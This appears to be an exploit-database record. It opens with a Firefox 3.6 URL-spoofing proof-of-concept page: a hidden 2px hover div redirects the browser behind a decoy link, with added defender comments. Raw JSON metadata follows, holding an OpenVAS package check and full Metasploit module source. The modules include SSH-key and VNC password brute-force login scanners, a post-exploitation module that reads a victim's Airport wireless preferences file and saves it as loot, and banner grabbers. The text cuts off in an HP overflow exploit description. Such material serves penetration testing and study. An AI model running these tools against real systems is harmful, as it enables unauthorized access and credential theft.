ID 1337DAY-ID-11053 Type zdt Reporter unknown Modified 2010-02-24T00:00:00
Description
Exploit for unknown platform in category local exploits
===============================================
Mozilla Firefox v3.6 URL Spoofing Vulnerability
===============================================
# Tested on: Windows XP SP2/3
# Code :
# You can trick a user into accessing a malicious website by using the following exploit.
# The first link would be the malicious one.
<!--
  Proof-of-concept page reproduced from the advisory above (Mozilla Firefox
  v3.6, "URL Spoofing", tested on Windows XP SP2/3 per the header).
  What the markup does: a 2x2 px, white, borderless, absolutely positioned
  <div> carries an onmouseover handler that assigns document.location, so
  hovering that near-invisible spot navigates the page, while the only
  visible link (text and href both "http://www.yahoo.com") is what the user
  believes they are interacting with.
  Reviewer notes for defenders:
  - This is a UI-deception / social-engineering pattern built on an inline
    event handler, not a parser or URL-rendering flaw: the anchor's href and
    its rendered text agree; only the hidden hover target differs.
  - A Content-Security-Policy that disallows inline script, or any sanitiser
    that strips inline event handlers from untrusted HTML, neutralises the
    onmouseover handler this page depends on.
  - The line breaks inside attribute values below (the JS string after
    "oHg5S", the CSS "bor"/"der" and "font-"/"size" splits) look like
    mail/paste wrapping of the original; as pasted, the handler's
    single-quoted string literal is split by a newline.
  - updatebox(event) on the anchor is not defined anywhere in this snippet,
    and the closing </div> near the end has no matching open tag (the only
    <div> is closed on the same element); browsers tolerate both.
-->
<html>
<body>
<!-- Hidden hover target: the navigation is triggered here, not on the visible link. -->
<div id="mydiv"
onmouseover="document.location='http://www.youtube.com/watch?v=oHg5S
JYRHA0';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px"></div>
<br>
<!-- Decoy: large visible link whose text and href match; updatebox is undefined in this snippet. -->
<a href="http://www.yahoo.com" onclick="updatebox(event)"><font
style="font-family:arial;font-
size:32px">http://www.yahoo.com</font></a><br>
<!-- Stray closing tag: no <div> is open at this point. -->
</div>
</body>
</html>
# 0day.today [2018-01-24] #
{"published": "2010-02-24T00:00:00", "id": "1337DAY-ID-11053", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:30:04", "bulletin": {"published": "2010-02-24T00:00:00", "id": "1337DAY-ID-11053", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.1, "modified": "2016-04-20T02:30:04"}}, "hash": "63afaeb9bae7c7e4b05611ce6d09292f8e41bc085e7885619632b0c342f36a52", "description": "Exploit for unknown platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T02:30:04", "edition": 1, "title": "Mozilla Firefox v3.6 URL Spoofing Vulnerability", "href": "http://0day.today/exploit/description/11053", "modified": "2010-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/11053", "references": [], "reporter": "unknown", "sourceData": "===============================================\r\nMozilla Firefox v3.6 URL Spoofing Vulnerability\r\n===============================================\r\n\r\n# Tested on: Windows XP SP2/3\r\n# Code :\r\n# You can trick a user into accessing a malicious website by using\r\nthe following exploit\r\n# The first link would be the malicious one.\r\n \r\n \r\n<html>\r\n<body>\r\n<div id=\"mydiv\"\r\nonmouseover=\"document.location='http://www.youtube.com/watch?v=oHg5S\r\nJYRHA0';\"\r\nstyle=\"position:absolute;width:2px;height:2px;background:#FFFFFF;bor\r\nder:0px\"></div>\r\n \r\n<br>\r\n<a href=\"http://www.yahoo.com\" onclick=\"updatebox(event)\"><font\r\nstyle=\"font-family:arial;font-\r\nsize:32px\">http://www.yahoo.com</font></a><br>\r\n \r\n</div>\r\n</body>\r\n</html>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, 
{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b7ede6e8036f313086125e60864bd281", "key": "sourceHref"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7bbb48bd90828ad578495d84e39fd617", "key": "title"}, {"hash": "8a3452e5f37e5a030c841a85e444cb50", "key": "href"}, {"hash": "55067a154b9cf4db30d4f43d84381460", "key": "sourceData"}, {"hash": "ad921d60486366258809553a3db49a4a", "key": "reporter"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category local exploits", "hash": "13a5562060724235b4c222b1fcd6d5be1e5e48e8955b9be9d98c45085766dbb0", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-01-24T19:22:40"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310874929"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5448"]}], "modified": "2018-01-24T19:22:40"}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-01-24T19:22:40", "edition": 2, "title": "Mozilla Firefox v3.6 URL Spoofing Vulnerability", "href": "https://0day.today/exploit/description/11053", "modified": "2010-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/11053", "references": [], "reporter": "unknown", "sourceData": "===============================================\r\nMozilla Firefox v3.6 URL Spoofing Vulnerability\r\n===============================================\r\n\r\n# Tested on: Windows XP SP2/3\r\n# Code :\r\n# You can trick a user into accessing a malicious website by using\r\nthe following exploit\r\n# The first link would be the malicious one.\r\n \r\n \r\n<html>\r\n<body>\r\n<div 
id=\"mydiv\"\r\nonmouseover=\"document.location='http://www.youtube.com/watch?v=oHg5S\r\nJYRHA0';\"\r\nstyle=\"position:absolute;width:2px;height:2px;background:#FFFFFF;bor\r\nder:0px\"></div>\r\n \r\n<br>\r\n<a href=\"http://www.yahoo.com\" onclick=\"updatebox(event)\"><font\r\nstyle=\"font-family:arial;font-\r\nsize:32px\">http://www.yahoo.com</font></a><br>\r\n \r\n</div>\r\n</body>\r\n</html>\r\n\r\n\r\n\n# 0day.today [2018-01-24] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "b176af9426cff8a77f89f1bb795155d2", "key": "href"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "modified"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ad921d60486366258809553a3db49a4a", "key": "reporter"}, {"hash": "653aae65eabde2cf63e0c9663ef08828", "key": "sourceData"}, {"hash": "9a605dd560ac66ec510ab8eae241bea4", "key": "sourceHref"}, {"hash": "7bbb48bd90828ad578495d84e39fd617", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"openvas": [{"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310874929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874929", "title": "Fedora Update for sox FEDORA-2018-f7a1334c68", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_f7a1334c68_sox_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for sox FEDORA-2018-f7a1334c68\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874929\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 06:35:14 +0200 (Wed, 15 Aug 2018)\");\n script_cve_id(\"CVE-2017-11332\", \"CVE-2017-11358\", \"CVE-2017-11359\", \"CVE-2017-15372\",\n \"CVE-2017-15642\", \"CVE-2017-15370\", \"CVE-2017-15371\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for sox FEDORA-2018-f7a1334c68\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"sox on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-f7a1334c68\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O5KW4OL54BD2Q43MB2AOQ652Y2HJPNE3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"sox\", rpm:\"sox~14.4.2.0~22.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2019-11-01T09:32:17", "bulletinFamily": "exploit", "description": "This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key, or several private keys in a single directory. Only a single passphrase is supported however, so it must either be shared between subject keys or only belong to a single one.\n", "modified": "2019-07-10T00:35:49", "published": "2014-08-01T19:47:08", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_LOGIN_PUBKEY", "href": "", "type": "metasploit", "title": "SSH Public Key Login Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/ssh'\nrequire 'metasploit/framework/login_scanner/ssh'\nrequire 'metasploit/framework/credential_collection'\nrequire 'sshkey'\nrequire 'net/ssh/command_stream'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::CommandShell\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::SSH::Options\n\n attr_accessor :ssh_socket, :good_key\n\n def initialize\n super(\n 'Name' => 'SSH Public Key Login Scanner',\n 
'Description' => %q{\n This module will test ssh logins on a range of machines using\n a defined private key file, and report successful logins.\n If you have loaded a database plugin and connected to a database\n this module will record successful logins and hosts so you can\n track your access.\n\n Key files may be a single private key, or several private keys in a single\n directory. Only a single passphrase is supported however, so it must either\n be shared between subject keys or only belong to a single one.\n },\n 'Author' => ['todb', 'RageLtMan'],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(22),\n OptPath.new('KEY_PATH', [true, 'Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in \".pub\" will be skipped.']),\n OptString.new('KEY_PASS', [false, 'Passphrase for SSH private key(s)']),\n ], self.class\n )\n\n register_advanced_options(\n [\n Opt::Proxies,\n OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptString.new('SSH_KEYFILE_B64', [false, 'Raw data of an unencrypted SSH public key. 
This should be used by programmatic interfaces to this module only.', '']),\n OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),\n OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', false])\n ]\n )\n\n deregister_options('PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS','USERPASS_FILE','PASSWORD_SPRAY')\n\n @good_key = ''\n @strip_passwords = true\n\n end\n\n def rport\n datastore['RPORT']\n end\n\n def ip\n datastore['RHOST']\n end\n\n def session_setup(result, scanner, fingerprint)\n return unless scanner.ssh_socket\n\n # Create a new session from the socket\n conn = Net::SSH::CommandStream.new(scanner.ssh_socket)\n\n # Clean up the stored data - need to stash the keyfile into\n # a datastore for later reuse.\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => result.credential.public,\n 'SSH_KEYFILE_B64' => [result.credential.private].pack(\"m*\").gsub(\"\\n\",\"\"),\n 'KEY_PATH' => nil\n }\n\n info = \"SSH #{result.credential.public}:#{fingerprint} (#{ip}:#{rport})\"\n s = start_session(self, info, merge_me, false, conn.lsock)\n self.sockets.delete(scanner.ssh_socket.transport.socket)\n\n # Set the session platform\n s.platform = scanner.get_platform(result.proof)\n\n # Create database host information\n host_info = {host: scanner.host}\n\n unless s.platform == 'unknown'\n host_info[:os_name] = s.platform\n end\n\n report_host(host_info)\n\n s\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} SSH - Testing Cleartext Keys\")\n\n if datastore[\"USER_FILE\"].blank? 
&& datastore[\"USERNAME\"].blank?\n # Ghetto abuse of the way OptionValidateError expects an array of\n # option names instead of a string message like every sane\n # subclass of Exception.\n raise OptionValidateError, [\"At least one of USER_FILE or USERNAME must be given\"]\n end\n\n keys = KeyCollection.new(\n key_path: datastore['KEY_PATH'],\n password: datastore['KEY_PASS'],\n user_file: datastore['USER_FILE'],\n username: datastore['USERNAME'],\n )\n\n keys = prepend_db_keys(keys)\n\n print_brute :level => :vstatus, :ip => ip, :msg => \"Testing #{keys.key_data.count} keys from #{datastore['KEY_PATH']}\"\n scanner = Metasploit::Framework::LoginScanner::SSH.new(\n host: ip,\n port: rport,\n cred_details: keys,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n proxies: datastore['Proxies'],\n connection_timeout: datastore['SSH_TIMEOUT'],\n framework: framework,\n framework_module: self,\n skip_gather_proof: !datastore['GatherProof']\n )\n\n scanner.verbosity = :debug if datastore['SSH_DEBUG']\n\n scanner.scan! 
do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}'\"\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n tmp_key = result.credential.private\n ssh_key = SSHKey.new tmp_key\n session_setup(result, scanner, ssh_key.fingerprint) if datastore['CreateSession']\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Could not connect: #{result.proof}\"\n end\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n end\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n else\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n end\n end\n\n end\n\n class KeyCollection < Metasploit::Framework::CredentialCollection\n attr_accessor :key_data\n attr_accessor :key_path\n\n def initialize(opts={})\n super\n valid!\n end\n\n # Override CredentialCollection#has_privates?\n def has_privates?\n !@key_data.empty?\n end\n\n def realm\n nil\n end\n\n def valid!\n @key_data = Set.new\n if File.directory?(@key_path)\n @key_files ||= Dir.entries(@key_path).reject { |f| f =~ /^\\x2e|\\x2epub$/ }\n @key_files.each do |f|\n data = read_key(File.join(@key_path, f))\n @key_data << data if valid_key?(data)\n end\n elsif File.file?(@key_path)\n data = 
read_key(@key_path)\n @key_data << data if valid_key?(data)\n else\n raise RuntimeError, \"No key path\"\n end\n end\n\n def valid_key?(key_data)\n !!(key_data.match(/BEGIN [RECD]SA PRIVATE KEY/) && !key_data.match(/Proc-Type:.*ENCRYPTED/))\n end\n\n def each\n prepended_creds.each { |c| yield c }\n\n if @user_file.present?\n File.open(@user_file, 'rb') do |user_fd|\n user_fd.each_line do |user_from_file|\n user_from_file.chomp!\n each_key do |key_data|\n yield Metasploit::Framework::Credential.new(public: user_from_file, private: key_data, realm: realm, private_type: :ssh_key)\n end\n end\n end\n end\n\n if @username.present?\n each_key do |key_data|\n yield Metasploit::Framework::Credential.new(public: @username, private: key_data, realm: realm, private_type: :ssh_key)\n end\n end\n end\n\n def each_key\n @key_data.each do |data|\n yield data\n end\n end\n\n def read_key(filename)\n @cache ||= {}\n @cache[filename] ||= Net::SSH::KeyFactory.load_data_private_key(File.read(key_path), password, false, key_path).to_s\n @cache[filename]\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb"}, {"lastseen": "2019-12-02T14:14:34", "bulletinFamily": "exploit", "description": "This module will download OS X Airport Wireless preferences from the victim machine. 
The preferences file (which is a plist) contains information such as: SSID, Channels, Security Type, Password ID, etc.\n", "modified": "2017-07-24T13:26:21", "published": "2012-03-27T06:18:38", "id": "MSF:POST/OSX/GATHER/ENUM_AIRPORT", "href": "", "type": "metasploit", "title": "OS X Gather Airport Wireless Preferences", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'OS X Gather Airport Wireless Preferences',\n 'Description' => %q{\n This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sinn3r'],\n 'Platform' => [ 'osx' ],\n 'SessionTypes' => [ \"meterpreter\", \"shell\" ]\n ))\n end\n\n def exec(cmd)\n tries = 0\n begin\n out = cmd_exec(cmd).chomp\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n end\n end\n\n\n def get_air_preferences\n pref = exec(\"cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist\")\n return pref =~ /No such file or directory/ ? nil : pref\n end\n\n def save(data)\n p = store_loot(\n \"apple.airport.preferences\",\n \"plain/text\",\n session,\n data,\n \"com.apple.airport.preferences.plist\")\n\n print_good(\"#{@peer} - plist saved in #{p}\")\n end\n\n def run\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n # Download the plist. 
If not found (nil), then bail\n pref = get_air_preferences\n if pref.nil?\n print_error(\"#{@peer} - Unable to find airport preferences\")\n return\n end\n\n # Save the raw version of the plist\n save(pref)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/gather/enum_airport.rb"}, {"lastseen": "2019-10-23T20:33:18", "bulletinFamily": "exploit", "description": "This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.\n", "modified": "2019-06-27T22:06:32", "published": "2011-09-03T02:09:00", "id": "MSF:AUXILIARY/SCANNER/VNC/VNC_LOGIN", "href": "", "type": "metasploit", "title": "VNC Authentication Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/rfb'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/vnc'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n def initialize\n super(\n 'Name' => 'VNC Authentication Scanner',\n 'Description' => %q{\n This module will test a VNC server on a range of machines and\n report successful logins. 
Currently it supports RFB protocol\n version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response\n authentication method.\n },\n 'Author' =>\n [\n 'carstein <carstein.sec[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0506'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::Proxies,\n Opt::RPORT(5900),\n OptString.new('PASSWORD', [ false, 'The password to test' ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"vnc_passwords.txt\") ]),\n\n # We need to set the following options to make sure BLANK_PASSWORDS functions properly\n OptString.new('USERNAME', [false, 'A specific username to authenticate as', '<BLANK>']),\n OptBool.new('USER_AS_PASS', [false, 'Try the username as the password for all users', false])\n ])\n\n deregister_options('PASSWORD_SPRAY')\n\n register_autofilter_ports((5900..5910).to_a) # Each instance increments the port by one.\n\n # We don't currently support an auth mechanism that uses usernames, so we'll ignore any\n # usernames that are passed in.\n @strip_usernames = true\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting VNC login sweep\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::VNC.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['ConnectTimeout'],\n max_send_size: 
datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vnc/vnc_login.rb"}, {"lastseen": "2019-11-30T12:11:29", "bulletinFamily": "exploit", "description": "POP3 Banner Grabber\n", "modified": "2017-07-24T13:26:21", "published": "2010-02-26T19:06:26", "id": "MSF:AUXILIARY/SCANNER/POP3/POP3_VERSION", "href": "", "type": "metasploit", "title": "POP3 Banner Grabber", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'POP3 Banner Grabber',\n 'Description' => 'POP3 Banner Grabber',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(110)\n ])\n end\n\n def run_host(ip)\n begin\n connect\n banner = sock.get_once(-1, 30)\n banner_sanitized = 
Rex::Text.to_hex_ascii(banner.to_s)\n print_good(\"#{ip}:#{rport} POP3 #{banner_sanitized}\")\n report_service(:host => rhost, :port => rport, :name => \"pop3\", :info => banner)\n rescue ::Rex::ConnectionError\n rescue ::EOFError\n print_error(\"#{ip}:#{rport} - The service failed to respond\")\n rescue ::Exception => e\n print_error(\"#{ip}:#{rport} - #{e} #{e.backtrace}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/pop3/pop3_version.rb"}, {"lastseen": "2019-12-05T13:43:07", "bulletinFamily": "exploit", "description": "Enumerates the version of MySQL servers.\n", "modified": "2017-07-24T13:26:21", "published": "2010-01-15T02:55:08", "id": "MSF:AUXILIARY/SCANNER/MYSQL/MYSQL_VERSION", "href": "", "type": "metasploit", "title": "MySQL Server Version Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'MySQL Server Version Enumeration',\n 'Description' => %q{\n Enumerates the version of MySQL servers.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE\n )\n\n register_options([\n Opt::RPORT(3306)\n ])\n end\n\n # Based on my mysql-info NSE script\n def run_host(ip)\n begin\n s = connect(false)\n data = s.get_once(-1,10)\n disconnect(s)\n if data.nil?\n print_error \"The connection to #{rhost}:#{rport} timed out\"\n return\n end\n rescue ::Rex::ConnectionError, ::EOFError\n vprint_error(\"#{rhost}:#{rport} - Connection failed\")\n return\n rescue ::Exception\n print_error(\"Error: #{$!}\")\n return\n end\n\n offset = 0\n\n l0, l1, l2 = data[offset, 3].unpack('CCC')\n length = l0 | (l1 << 8) | (l2 << 16)\n\n # Read a bad amount of data\n 
return if length != (data.length - 4)\n\n offset += 4\n\n proto = data[offset, 1].unpack('C')[0]\n\n # Application-level error condition\n if proto == 255\n offset += 2\n err_msg = Rex::Text.to_hex_ascii(data[offset..-1].to_s)\n print_status(\"#{rhost}:#{rport} is running MySQL, but responds with an error: #{err_msg}\")\n report_service(\n :host => rhost,\n :port => rport,\n :name => \"mysql\",\n :info => \"Error: #{err_msg}\"\n )\n else\n offset += 1\n version = data[offset..-1].unpack('Z*')[0]\n print_good(\"#{rhost}:#{rport} is running MySQL #{version} (protocol #{proto})\")\n report_service(\n :host => rhost,\n :port => rport,\n :name => \"mysql\",\n :info => version\n )\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/mysql/mysql_version.rb"}, {"lastseen": "2019-11-21T23:29:22", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). 
